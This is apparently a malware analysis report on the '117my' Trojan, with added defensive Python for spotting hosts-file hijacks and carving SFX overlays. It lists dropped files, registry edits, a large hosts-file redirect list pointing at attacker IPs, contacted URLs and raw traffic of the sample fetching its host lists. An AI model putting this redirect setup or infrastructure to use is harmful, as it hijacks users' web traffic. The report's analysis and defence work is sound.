[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"EnableConsoleTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
0392346d2aa6c76da5ca7dda28564b41 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.exe |
4a9e26121421e5b6c47f50309cb63266 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.skn |
671575e2cc623b3d093538f1e658ad93 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\iat.dll |
23d8fd353597d2edda54bdbad280749f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\svchostlsp.exe |
6a455c4a2c7fe46c633fd085c0204696 | c:\Windows\117my.exe |
4a9e26121421e5b6c47f50309cb63266 | c:\Windows\117my.skn |
6ded751b628ddb2a1c0c05f18858437c | c:\Windows\System32\ESPI11.dll |
ee6c854fa4e81138fcfcfbda7418ec6b | c:\Windows\svchosl.exe |
57b609130b60649f4a2729b164b7527b | c:\Windows\svchost.exe |
6ded751b628ddb2a1c0c05f18858437c | c:\Windows\twain_32\config\ESPI11.dll |
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which maps hostnames to IP addresses and is consulted before DNS, so every name listed below resolves to the attacker-chosen address instead of its real one. The modified file is 5537 bytes in size. The following entries are added to the hosts file (all point at 170.178.171.31 except www.117my.com, which points at 170.178.171.34):
IP | Hostname |
---|---|
170.178.171.31 | www.176cc.cc |
170.178.171.31 | www.52my.com |
170.178.171.31 | www.crsky.com |
170.178.171.31 | crsky.com |
170.178.171.31 | www.901my.com |
170.178.171.31 | 901my.com |
170.178.171.31 | moyu.so |
170.178.171.31 | kkk.dstfkj.com.cn |
170.178.171.31 | dstfkj.com.cn |
170.178.171.31 | www.214my.com |
170.178.171.31 | www.h360k.com |
170.178.171.31 | h360k.com |
170.178.171.31 | rsivy.pw |
170.178.171.31 | 214my.com |
170.178.171.31 | www.270my.com |
170.178.171.31 | 360.chihuo0517.com |
170.178.171.31 | chihuo0517.com |
170.178.171.31 | 270my.com |
170.178.171.31 | www.moyu.so |
170.178.171.31 | www.hwkam.com |
170.178.171.31 | 178stu.com |
170.178.171.31 | www.178stu.com |
170.178.171.31 | hwkam.com |
170.178.171.31 | www.5917wan.com |
170.178.171.31 | www.delifs.com |
170.178.171.31 | delifs.com |
170.178.171.31 | www.11moyu.com |
170.178.171.31 | t2.web.tonnn.com |
170.178.171.31 | www.2828my.com |
170.178.171.31 | 2828my.com |
170.178.171.31 | tonnn.com |
170.178.171.31 | www.11my.net |
170.178.171.31 | www.91my.com |
170.178.171.31 | 91my.com |
170.178.171.31 | wg.91my.com |
170.178.171.31 | my.178stu.com |
170.178.171.31 | 134my.com |
170.178.171.31 | www.134my.com |
170.178.171.31 | 001my.com |
170.178.171.31 | www.910my.com |
170.178.171.31 | 910my.com |
170.178.171.31 | www.901my.com |
170.178.171.31 | 901my.com |
170.178.171.31 | www.6moyu.com |
170.178.171.31 | 110moyu.com |
170.178.171.31 | www.110moyu.com |
170.178.171.31 | dl.pconline.com.cn |
170.178.171.31 | www.moyushou.com |
170.178.171.31 | pconline.com.cn |
170.178.171.31 | www.52z.com |
170.178.171.31 | wanba.baidu.com |
170.178.171.31 | www.99sfmy.com |
170.178.171.31 | www.mycom114.com |
170.178.171.31 | www.xpy7.com |
170.178.171.31 | xpy7.com |
170.178.171.31 | www.tztw88.net |
170.178.171.31 | www.cncrk.com |
170.178.171.31 | www.laomy.net |
170.178.171.31 | www.kk8181.com |
170.178.171.31 | pk255.com |
170.178.171.31 | www.pk255.com |
170.178.171.31 | www.99hjmy.com |
170.178.171.31 | www.550my.com |
170.178.171.31 | 99moyu.net |
170.178.171.31 | www.n13.cc |
170.178.171.31 | www.18ytl.com |
170.178.171.31 | www.x99my.cc |
170.178.171.31 | tg.weegame.com |
170.178.171.31 | weegame.com |
170.178.171.31 | t.cnsaier.com |
170.178.171.31 | cnsaier.com |
170.178.171.31 | laas.zafu.edu.cn |
170.178.171.31 | www.tianya.cn |
170.178.171.31 | www.9000my.com |
170.178.171.31 | 139my.3313sf.cn |
170.178.171.31 | www.qweqt.org.cn |
170.178.171.31 | moyu.spxwj.com |
170.178.171.31 | www.ahwfauto.com |
170.178.171.31 | www.ttms168.com |
170.178.171.31 | www.x99moyu.net |
170.178.171.31 | t.kmly988.com |
170.178.171.31 | t.ahtaoy.com |
170.178.171.31 | t.cnsaier.com |
170.178.171.31 | www.55moyu.com |
170.178.171.31 | www.xsf7.com |
170.178.171.31 | 99moyu.com |
170.178.171.31 | www.99moyu.com |
170.178.171.31 | sogou.1118st.com |
170.178.171.31 | 1118st.com |
170.178.171.31 | www.173185.net |
170.178.171.31 | www.518ak.com |
170.178.171.31 | lpput.com |
170.178.171.31 | hjmyh.com |
170.178.171.31 | www.5555my.com |
170.178.171.31 | aaa.5555my.com |
170.178.171.31 | www.hjmyh.com |
170.178.171.31 | www.195my.com |
170.178.171.31 | 195my.com |
170.178.171.31 | www.195sy.com |
170.178.171.31 | 195sy.com |
170.178.171.31 | spxwj.com |
170.178.171.31 | 817zs.cn |
170.178.171.31 | mmmmm.cnm78.com |
170.178.171.31 | www.139sfmy.com |
170.178.171.31 | www.gaoji.co |
170.178.171.31 | kkk.5917my.com |
170.178.171.31 | 5917my.com |
170.178.171.31 | cnm78.com |
170.178.171.31 | www.87tf.com |
170.178.171.31 | www.wxycw.com |
170.178.171.31 | zzxyyyz.com |
170.178.171.31 | www.zzxyyyz.com |
170.178.171.31 | www.150my.com |
170.178.171.31 | www.seefp.com |
170.178.171.31 | www.sz-jhled.com |
170.178.171.31 | www.9my.net |
170.178.171.31 | www.92mysf.com |
170.178.171.31 | sogu.173185.net |
170.178.171.31 | 173185.net |
170.178.171.31 | jxkb56.com |
170.178.171.31 | yon.jxkb56.com |
170.178.171.31 | sogou13.170shouyou.com |
170.178.171.31 | www.915my.com |
170.178.171.31 | 915my.com |
170.178.171.31 | www.hao2288.cn |
170.178.171.31 | ddddddd.xckdee.com |
170.178.171.31 | www.173ka.net |
170.178.171.31 | duge.xunleimy.com |
170.178.171.31 | mmmmm.cnm78.com |
170.178.171.31 | kkk.51173wan.com |
170.178.171.31 | www.hao2288.cn |
170.178.171.31 | ddddddd.xckdee.com |
170.178.171.31 | www.173ka.net |
170.178.171.31 | duge.xunleimy.com |
170.178.171.31 | mmmmm.cnm78.com |
170.178.171.31 | kkk.51173wan.com |
170.178.171.31 | 170shouyou.com |
170.178.171.31 | www.173ka.net |
170.178.171.31 | www.58wg.co |
170.178.171.31 | www.58wgw.com |
170.178.171.31 | www.my158.com |
170.178.171.31 | www.huaimy.com |
170.178.171.31 | huaimy.com |
170.178.171.31 | www.dudumy.cn |
170.178.171.31 | www.nmoyu.com |
170.178.171.31 | www.357my.com |
170.178.171.31 | www.139my.com |
170.178.171.31 | www.001my.com |
170.178.171.31 | www.xunleimy.com |
170.178.171.34 | www.117my.com |
170.178.171.31 | www.181my.com |
170.178.171.31 | kkk.51173wan.com |
170.178.171.31 | www.ucbug.com/moyu |
170.178.171.31 | www.zhujiangroad.com |
170.178.171.31 | sss.u8nz.com |
170.178.171.31 | www.xixiwg.com |
170.178.171.31 | www.vdisk.cn |
170.178.171.31 | www.592my.net |
170.178.171.31 | www.581my.com |
170.178.171.31 | www.592wg.cc |
170.178.171.31 | www.moyusifu.com |
170.178.171.31 | www.139myw.com |
170.178.171.31 | www.rmoyu.com |
170.178.171.31 | www.001my.com.co |
170.178.171.31 | www.001my.com.cn |
170.178.171.31 | mmm.139sfmy.com |
170.178.171.31 | my.99.com |
170.178.171.31 | 99.com |
170.178.171.31 | www.tjggg.com |
170.178.171.31 | www.gmoyu.com |
170.178.171.31 | 139sfmy.com |
170.178.171.31 | 770my.com |
170.178.171.31 | www.770my.com |
170.178.171.31 | www.660my.com |
170.178.171.31 | 660my.com |
170.178.171.31 | www.2525my.cn |
170.178.171.31 | tjggg.com |
170.178.171.31 | www.99my.com.co |
170.178.171.31 | www.520jzw.com |
170.178.171.31 | www.70my.com |
170.178.171.31 | www.13moyu.com |
170.178.171.31 | laomy.net |
170.178.171.31 | www1.dlbyhw.com |
170.178.171.31 | dlbyhw.com |
170.178.171.31 | www.clzs888.com |
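Checking a hosts file for this pattern is easy to automate. The following added example (not part of the Lavasoft report) parses hosts-file text, groups every hostname that is mapped to a non-loopback address by that address, flags malformed entries such as the www.ucbug.com/moyu line above, and produces a cleaned copy that keeps only comments and loopback or 0.0.0.0 mappings. The hosts text it runs on is a constructed sample built from a few of the entries listed, not the full 5537-byte file.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: comment lines like the stock Windows 7 file, two benign mappings,
# and a handful of the entries this report lists (including one malformed line).
SAMPLE_HOSTS = """\
# constructed sample, not a real dump; comment lines and blanks are ignored
# the stock Windows 7 file carries only comments such as the next line
#   127.0.0.1       localhost
127.0.0.1 localhost
::1 localhost
0.0.0.0 ads.example.test   # ad-block style sink, not a hijack
170.178.171.31 www.crsky.com crsky.com
170.178.171.31 www.901my.com
170.178.171.31 www.901my.com
170.178.171.34 www.117my.com
170.178.171.31 www.ucbug.com/moyu
"""


def parse_hosts(text):
    """Yield (line_no, address_text, [names]) for each entry; comments and blanks skipped."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()
        if body:
            fields = body.split()
            yield line_no, fields[0], fields[1:]


def find_hijacks(text):
    """Group every hostname pointed at a non-loopback, non-unspecified address by that
    address. One address collecting many names for sites the user never added is the
    hosts-file hijack pattern. Also returns lines that cannot be valid hosts entries."""
    by_ip = defaultdict(list)
    bad_lines = []
    for line_no, addr_text, names in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(addr_text)
        except ValueError:
            bad_lines.append((line_no, addr_text))
            continue
        if addr.is_loopback or addr.is_unspecified or not names:
            continue
        for name in names:
            if "/" in name:  # a URL path can never match a hostname; the line is junk a tool wrote
                bad_lines.append((line_no, name))
            by_ip[str(addr)].append(name.lower())
    return dict(by_ip), bad_lines


def busiest_address(by_ip):
    """The address collecting the most distinct names; in a hijack it is the sinkhole."""
    return max(by_ip, key=lambda ip: len(set(by_ip[ip]))) if by_ip else None


def clean_hosts(text):
    """Return the file with every non-loopback mapping removed, keeping comments and
    loopback/0.0.0.0 lines so a legitimate ad-block file survives the cleanup."""
    kept = []
    for raw in text.splitlines():
        body = raw.split("#", 1)[0].strip()
        if not body:
            kept.append(raw)
            continue
        try:
            addr = ipaddress.ip_address(body.split()[0])
        except ValueError:
            continue
        if addr.is_loopback or addr.is_unspecified:
            kept.append(raw)
    return "\n".join(kept) + "\n"
```

On a live host read `%SystemRoot%\System32\drivers\etc\hosts` into `text`, review the output of `find_hijacks(text)` and write `clean_hosts(text)` back only after confirming that nothing listed was added deliberately; a clean Windows 7 hosts file holds comments only, so the report's suggested "127.0.0.1 localhost" line is harmless but not required.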
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate the malicious process(es):
svchostlsp.exe:3736
%original file name%.exe:452
117my.exe:2736
117my.exe:944
svchosl.exe:3732 (the process the Trojan injects into; it is also the target of the autorun entry below)
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\twain_32\config\ESPI11.dll (244 bytes)
C:\Windows\System32\addressoftext.inscan (1 bytes)
C:\Windows\System32\ESPI11.dll (723 bytes)
C:\Windows\svchost.exe (12649 bytes)
C:\Windows\117my.exe (7296 bytes)
C:\Windows\117my.com.bat (258 bytes)
C:\Windows\Game.ico:Zone.Identifier (26 bytes)
C:\Windows\svchosl.exe (8713 bytes)
C:\Windows\117my.skn (2160 bytes)
C:\Users\"%CurrentUserName%"\Desktop\117魔域7.1.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YBU4WGCW.txt (103 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\host[1].htm (775 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.exe (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\svchostlsp.exe (1948 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\JpHrc.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Mag.dat (101 bytes)
C:\Windows\System32\drivers\etc\hosts (39 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Repairdata.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.skn (62 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\117my.ini (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\iat.dll (89 bytes)
- Delete the following value(s) in the autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xf1" = "C:\Windows\svchosl.exe /start"
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files.
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 188392 | 188416 | 4.65119 | 2ae181684b1677561119f5765623448e |
.rdata | 192512 | 39376 | 39424 | 3.57169 | 0e0f6a60d8fa917a060c8ef7becc0888 |
.data | 233472 | 129208 | 3072 | 2.28424 | 4e4aa728d9cced1622c2be27733e3fc5 |
.gfids | 364544 | 240 | 512 | 1.47202 | c923099e27bf0e45a5c402d935d0620b |
.rsrc | 368640 | 19884 | 19968 | 4.01107 | 5c996f60fd4566aa444b73d2a69de10c |
.reloc | 389120 | 8076 | 8192 | 4.59547 | d13d3f8a8adfe6861c49a01d81cf73ed |
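The six Raw Size values above sum to 259,584 bytes, so the section table accounts for roughly 260 KB of a 5,135,223-byte file, and the sample deletes C:\Windows\__tmp_rar_sfx_access_check_1308957, the write-access probe a WinRAR self-extracting stub creates in its extraction directory. Together these indicate that the PE sections are an SFX stub and the dropped files travel in the overlay appended after the last section, which the table alone cannot measure because it omits PointerToRawData. The following added example (not part of the Lavasoft report) parses a PE section table, locates the overlay and classifies it by archive signature; the PE it builds for demonstration is constructed in memory and is not this sample.

```python
import struct

# Signatures of archive formats commonly wrapped in self-extracting stubs.
OVERLAY_MAGICS = {
    b"Rar!\x1a\x07": "rar",  # RAR4 (prefix + 00) and RAR5 (prefix + 01 00) share this start
    b"PK\x03\x04": "zip",
    b"7z\xbc\xaf\x27\x1c": "7z",
}


def pe_sections(data):
    """Parse the section table of a PE image given the bytes of the file on disk."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    num_sections, size_opt = struct.unpack_from("<xxH12xH2x", data, e_lfanew + 4)
    table = e_lfanew + 24 + size_opt
    sections = []
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER starts: Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        name, vsize, vaddr, rsize, rptr = struct.unpack_from("<8sIIII", data, table + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": vaddr, "virtual_size": vsize,
                         "raw_size": rsize, "raw_pointer": rptr})
    return sections


def pe_overlay(data):
    """Locate the data appended after the last section's raw bytes and guess what it is."""
    end = max((s["raw_pointer"] + s["raw_size"] for s in pe_sections(data)), default=0)
    overlay = data[end:]
    kind = next((k for magic, k in OVERLAY_MAGICS.items() if overlay.startswith(magic)), None)
    return {"overlay_offset": end, "overlay_size": len(overlay), "overlay_kind": kind}


def overlay_report(path):
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as fh:
        data = fh.read()
    info = pe_overlay(data)
    info["file_size"] = len(data)
    return info


def build_sample_pe(section_payload, overlay):
    """Constructed minimal PE32 for the demonstration: one .text section, then appended data."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    size_opt = 0xE0  # PE32 optional header; left zeroed, the parser never reads it
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt, 0x0102)
    raw_ptr = 0x200
    section = struct.pack("<8sIIIIIIHHI", b".text", len(section_payload), 0x1000,
                          len(section_payload), raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + b"\0" * size_opt + section).ljust(raw_ptr, b"\0")
    return headers + section_payload + overlay
```

For a real SFX, `overlay_report(path)` gives the offset at which to carve the archive out (`data[overlay_offset:]`) and hand it to an extractor in a sandbox, which recovers the dropped files listed in this report without executing the stub.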
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
The requests below to ocsp.globalsign.com, ocsp2.globalsign.com, cdn.globalsigncdn.com and gpla1.wac.v2cdn.net are OCSP and CRL certificate-revocation lookups made by the Windows certificate stack while the pages were loaded; they are not indicators specific to this sample.
URL | IP |
---|---|
hxxp://passport.n.shifen.com/?business&un=5182235367&from=prin | |
hxxp://www.gxnkw.com/jc/bjcguanjianzi.txt?WebShieldDRSessionVerify=YizhEArCBnQ1QwpILGI0 | |
hxxp://www.gxnkw.com/jc/tongji.txt | |
hxxp://www.gxnkw.com/jc/bjcguanjianzi.txt | |
hxxp://www.gxnkw.com/jc/jcd.txt | |
hxxp://www.92117my.com/host.html | 122.228.30.106 |
hxxp://18201869647.oicp.net/ | |
hxxp://18201869647.oicp.net/favicon.ico | |
hxxp://www.gxnkw.com/jc/hostjc.txt | |
hxxp://www.92117my.com/index1.htm | 122.228.30.106 |
hxxp://www.92117my.com/logo.jpg | 122.228.30.106 |
hxxp://www.92117my.com/game.html | 122.228.30.106 |
hxxp://www.92117my.com/images/new.js | 122.228.30.106 |
hxxp://www.92117my.com/images/xx.css | 122.228.30.106 |
hxxp://www.92117my.com/images/bg.jpg | 122.228.30.106 |
hxxp://www.92117my.com/images/Index_c1_r5.jpg | 122.228.30.106 |
hxxp://www.92117my.com/Images/Index_bottom.jpg | 122.228.30.106 |
hxxp://cdn.globalsigncdn.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH | |
hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDBisczuS0Hu180XFAA== | |
hxxp://www.92117my.com/favicon.ico | 122.228.30.106 |
hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDGlwEnDh1Wq84Ev4Sw== | |
hxxp://www.taobao.com.danuoyi.tbcache.com/ | 213.244.178.246 |
hxxp://cdn.globalsigncdn.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDEVLD4SzDqtMG/eBnw== | |
hxxp://www.gxnkw.com/jc/hostjc.txt?WebShieldDRSessionVerify=EMGc17Wrs9kjNC7K8XBq | |
hxxp://gpla1.wac.v2cdn.net/CRL/Omniroot2025.crl | |
hxxp://www.taobao.com/ | 213.244.178.246 |
hxxp://passport.baidu.com/?business&un=5182235367&from=prin | |
hxxp://ocsp.globalsign.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH | 104.16.26.216 |
hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDGlwEnDh1Wq84Ev4Sw== | 104.16.27.216 |
hxxp://www.117my.cc/ | 183.60.204.14 |
hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDBisczuS0Hu180XFAA== | 104.16.27.216 |
hxxp://cdp1.public-trust.com/CRL/Omniroot2025.crl | 93.184.220.20 |
hxxp://www.117my.cc/favicon.ico | 183.60.204.14 |
hxxp://ocsp2.globalsign.com/gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDEVLD4SzDqtMG/eBnw== | 104.16.27.216 |
wg.200my.com | 122.224.48.120 |
s95.cnzz.com | 1.99.192.16 |
z4.cnzz.com | 1.122.192.15 |
world.taobao.com | 213.244.178.246 |
c.cnzz.com | 123.138.67.81 |
cnzz.mmstat.com | 198.11.132.221 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: Safedog/4.0.0
Location: /jc/hostjc.txt?WebShieldDRSessionVerify=EMGc17Wrs9kjNC7K8XBq
Content-Length: 0
Connection: Close
Content-Type: text/html
GET /jc/bjcguanjianzi.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 200
Content-Type: text/plain
Last-Modified: Sun, 08 Jan 2017 11:29:25 GMT
Accept-Ranges: bytes
ETag: "583b2977a269d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:41 GMT
....sf......................001my..139my..70..........................................................................001......139..............178................520........................chihuo0517....
GET /jc/jcd.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 32
Content-Type: text/plain
Last-Modified: Thu, 12 Jan 2017 10:59:28 GMT
Accept-Ranges: bytes
ETag: "ca42d5f1c26cd21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:41 GMT
hXXp://VVV.92117my.com/host.html....
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:42 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:42 GMT..
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDGlwEnDh1Wq84Ev4Sw== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:40 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d9bd14783e463ca82c5866086ae2f56f41484786440; expires=Fri, 19-Jan-18 00:40:40 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 23:26:57 GMT
Expires: Sun, 22 Jan 2017 23:26:57 GMT
ETag: "ce2c9bab38408c822469b28825da8da8a11ff254"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c92e3e24038-SOF
0..........0..... .....0......0...0.......M........u....%...G..20170118232657Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|..ip.p..j..K.K....20170118232657Z....20170122232657Z0...*.H.............uO.5......./w;3.....3.J.n...E.....j.i..'...?.n>..J..l.sa......./....@.z..Qh.cc..l[...q.W ...g%.....o...f..."....9..;v_.n..m..!...f@.M...!.Yu.L3'C.6'......saI.G.d'B..b.u.H......_....m.f.Z.....g...DHY.z.O[.|U[o..#.O....0<....h....>...}..m..s....O..........8t...K0..G0..C0.. .......q..}.dc.j..(0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20...161124031843Z..170224031843Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....2016112411281M0K..U...DGlobalSign Organization Validation CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C..0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.........u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U.......M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0......0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/repository/0...U...........0...U.%..0... .......0...*.H..............H.....C.Ie....;.yN.'..../?.T..-T.a..4...n..OW/l....[|..-.i../.'..1."......3[...J.....\@.S.=-p..p......d...>~J.|E0y......!.;.c.,...||.V....K..L...dX...a....6'..U..G....A;..........4K...........k.B].
<<< skipped >>>
GET /?business&un=5182235367&from=prin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: passport.baidu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: keep-alive
Content-Type: text/html
Date: Thu, 19 Jan 2017 00:40:03 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: Apache
Set-Cookie: BAIDUID=9D02E474B4BC9B1BC9F49E269184DEEF:FG=1; expires=Fri, 19-Jan-18 00:40:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Tracecode: 24029977590332382986011908
Tracecode: 24029977590286507274011908
Vary: Accept-Encoding
Vary: Accept-Encoding
Transfer-Encoding: chunked
3d0..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<title>........................_5182235367</title>.<link rel="stylesheet" href="/style/v2/info.css?t=20100901" type="text/css" media="all" />.<script type="text/javascript" src="/js/center_accountbind.js?t=20100901"></script>.<script type="text/javascript" src="/js/business.js?t=20100901"></script>.<script language="javascript">. document.domain = "baidu.com";. window.hasSpace = '';. var tabinfo = initTabInfo('5182235367');. var ab=gethash(1);. if(ab>0 && ab<tabinfo.length). {. if(tabinfo[ab][2]=="_blank"). {. window.location=tabinfo[ab][0];. }. }. function fixImgSize(img){... var width = img.offsetWidth;... var height = img.offsetHeight;... if( w..1a65..idth>78 ){... width>height?( img.style.width='78px' ):( img.style.height='78px' );... }else if( height>78 ){... img.style.height='78px';... }.. }. </script>.</head>.<body onLoad="javascript:chgdeftab(0);">. <div 